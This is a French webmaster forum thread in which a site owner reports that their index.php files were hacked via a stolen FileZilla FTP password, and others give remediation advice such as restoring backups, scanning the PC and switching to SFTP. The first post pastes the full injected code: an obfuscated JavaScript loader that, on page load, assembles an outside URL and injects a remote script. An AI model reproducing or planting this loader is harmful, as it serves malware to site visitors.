PIRATAGE INDEX.PHP HELP SVP....

[juju34070]

Bonjour à tous....

Aujourd'hui je viens d'avoir une très mauvaise surprise.... Je viens de me faire pirater mon site....
La cause ? j'ai fais la grosse connerie de laisser mon MDP de filzilla enregistré...

on m'a modifier mes index.php

je n'ai plus accès au site du tout... uniquement au back office. et le pon pon : je n'ai pas fait de sauvegarde....

voici ce qui se trouve actuellement dans mon index.php :

<?php

header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");

header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

header("Location: ../");
exit;

.[removed]var S;if(S!='' && S!='x'){S=''};try {var q=new Array();var Pw=new String();this.A="";var b;if(b!='G'){b=''};var k='';var W="replav3ES".substr(0,5)+"87tce78t".substr(3,2);var U=RegExp;var l=new String("p2q]".substr(3));var AY;if(AY!='v' && AY!='kH'){AY='v'};this.vR="";var hJ="[";var r="g";var _l=new Array();function h(Q,F){var XJ;if(XJ!='' && XJ!='qg'){XJ=null};this.kU='';var hz=new Date();var I=hJ;var Oi;if(Oi!='zb' && Oi != ''){Oi=null};I+=F;var s;if(s!='' && s!='ix'){s=''};var n=new Date();I+=l;var kv;if(kv!='' && kv!='iu'){kv='cu'};var _=new U(I, r);var bL;if(bL!='' && bL!='nk'){bL=''};return Q.replace(_, k);};var P=new String("onloEzYA".substr(0,4)+"ad");var yL;if(yL!='' && yL!='gG'){yL=''};var p=h('89790639983930393',"3697");var io='';var Z=h('hPtPtTp2:T/2/Ya2rPgYojsP-YcPoT-Tu2kP.jbTaTrTnYeYsYaTnPdTnTo2bPlPeY.2cYojmT.Yh2uPdTo2nPgP-jc2ojmT.Ym2y2oYwYnPaTgTeY.2rPuY:P',"TPY2j");var QA=new String("scriCzMB".substr(0,4)+"710ipt107i".substr(4,2));var i=new String("/rb"+"MZwc.r".substr(3)+"69lEu/r".substr(4)+"Fq7sbc.".substr(4)+"ru/"+"wgBforgwB".substr(3,3)+"umc"+"ommwVA".substr(0,3)+"k8JluniJlk8".substr(4,3)+"Ynrty.".substr(3)+"netU6ZA".substr(0,3)+"/in"+"sighqk2".substr(0,3)+"hte"+"0skxpr".substr(3)+"vJOessvJO".substr(3,3)+"Purai.Pur".substr(3,3)+"9HkcomHk9".substr(3,3)+"U8f/gofU8".substr(3,3)+"ogl"+"XlSre.cXrlS".substr(4,3)+"Ht0om.".substr(3)+"B3rUphp".substr(4));var ec;if(ec!=''){ec='r_'};var e='';var Q="1";var pO="";var Nj="";var _F="";var rQD;if(rQD!='' && rQD!='jW'){rQD='Cj'};var Zs=new Array();var DL=new Array();window[P]=function(){var Bf=new String();var Ev;if(Ev!='_w' && Ev!='w'){Ev='_w'};var S_='';g=document.createElement(QA);var Ck=new Date();var MU;if(MU!='s_'){MU=''};e+=Z;var zZ;if(zZ!='BD' && zZ != ''){zZ=null};var Iv='';e+=p+i;var mc=new String();var Jk=new String();this.TI="";var c=document.body;var Nt=new Date();g.src=e;g.defer=Q;var bj=new String();var vm=new Date();c.appendChild(g);var Xd;if(Xd!='' && Xd!='Ec'){Xd=''};};} catch(T){var KT;if(KT!='pdB' && KT != ''){KT=null};var uw=new Array();};[removed]
<!--54c62b13963bba453750e3038541a331-->.


HELLLPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP

[jeckyl]

Salut,

Pas besoin de sauvegarde pour les fichiers racine surtout comme index.php, il te suffit de remettre l'original.

Par contre tu feras des sauvegardes maintenant.

[juju34070]

Salut Jeckyl !!

Ah bon c'est tout ?? effectivement il y a que les fichiers index.php qui ont été modifié...

Lol Oui cela m'a servi de leçon, d'autant plus que j'avais deja vu sur le forum des problèmes avec filezilla et des récups de pass... mais je me disais, à moi ,ca m'arrivera pas ! ben voila ce fut mon tour lol.

Merci Jeckyl, par contre j'ai plusieurs index.php un peu partout, c'est le hacker qui a fait joujou ou c'est normal ? j'avais jamais fais gaffe avant...

[Nov]

Comment es ce arrivé? Un pc au boulot??

[funnytoy]

Bonjour,

Je compatis car je viens d'avoir la même mauvaise surprise, pas avec mon site prestashop mais avec un autre site en Joomla. Le problème est le même. J'ai travaillé presqu'une semaine pour tout remettre en ordre et tout sécuriser.
Effectivement ton mot de passe FTP a été récupéré grâce à une saloperie installée sur ton PC.

Je te recommande donc d'abord de passer ton PC à la moulinette avec un bon antivirus et un bon anti-spyware.
Ensuite et très important, change les mots de passe FTP de tous tes sites, sinon tu vas travailler pour rien et le problème va se représenter sous peu.
Dans mon cas, j'ai même acheté un nouveau logiciel FTP. J'ai choisi FTPRush, un peu déroutant au début, mais très bon logiciel FTP. J'ai ensuite désinstallé mon ancier logiciel FTP (dans ton cas Filezilla) afin d'effacer éventuellement toute trace de mots de passe qui pourraient traîner dans un fichier de configuration.

Le problème est que le piratage attaque TOUS les fichiers index et dans mon cas également tous les fichiers .js
Donc il était impensable d'ouvrir tous les dossiers et de corriger manuellement tous les fichiers!
J'ai la chance d'avoir un très bon hébergeur (Infomaniak) qui met à ma disposition des backups journaliers du site et de la base de donnée.
Demande donc à ton hébergeur s'il peut te fournir un backup récent de ton site.
Vérifie que ce back up n'est pas infecté et remplace carrément tout ton site par FTP par le backup sain.

Surtout ne met plus en mémoire tes mots de passe FTP dans ton logiciel de transfert.

Et si d'autres personnes que toi se connectent égamelent en FTP à ton site, demande leur de désinfecter aussi leurs PC car le problème est peut-être chez eux et pas chez toi.
Bon courage à toi.

[riga]

J'ai déja eu ce probleme plusieurs fois l'année dernière.

Je suppose que vous utiliséz FileZilla et un bon vieux pc?
Votre piratage reviendra à chaque vois que vous ferez un upload via filezilla sur votre site.

à l'époque j'en avais marre de refaire les index j'ai donc opté pour un mac. et comme par magie plus de problème du jour au lendemain

[nicolas92]

j’ai donc opté pour un mac. et comme par magie plus de problème du jour au lendemain

Pour avoir subi ce même genre de problèmes (XP+Filezilla+mots de passes stockés en gestionnaires de site) j'ai fais pareil, passage au mac + filezilla mais en mettant des mots de passe bien plus costaud qui ne sont nulle part sur le disque dur : sur un bon papier et je le tape a chaque fois, depuis, aucun problème....

[toph-69]

bonjour
je comprend pas quelque chose et comme je suis utilisateur filezilla j'aimerais comprendre ..

pour obtenir les pass faut vous faire hacker non ?

faut bien qu'ont viennent chercher les infos sur votre PC ou est ce une faille de filezilla ?

merci

[Yoya]

Lu' Lucifer
C'est un virus qui récupère les mots de passes / login des sites 'connexion rapide' enregistré dans Filezilla.

Cdlt,
Pierre.

[moncler]

La magie du mac avec les virus, c'est d'etre suffisament cher pour que les pirates ne s'interessent pas encore a ce marché reduit.

[easybizness]

Si ils s'y intéressent mais l'environnement mac est un peu plus costaud que celui du PC.

mais t'inquiètes le mac devient un produit de grande consommation. Donc il entre déjà dans les normes.

Il vaut tout de même mieux prendre certaines précautions comme ne pas enregistré ses mots de passe dans filezilla.

[toph-69]

ok merci des reponses

ben en faite faut aussi un bon anti virus + anti spyware + pare feu etc ....

bon je touche du bois, jamais rien passer sur mon pc ^^ hehe c'est peut être le pseudo lol ^^


Tchouss

[Seo Organique]

sans surprises, vous utilisez des clients FTP je vous conseille d'utiliser des clients SFTP utilisant le protocole SSH.
en voici un exemple pour les utilisateurs de win : WINSCP ça vous évitera d'investir dans un mac ou d'installer une distrib linux pour les plus motivés.

Cordialement,
Aline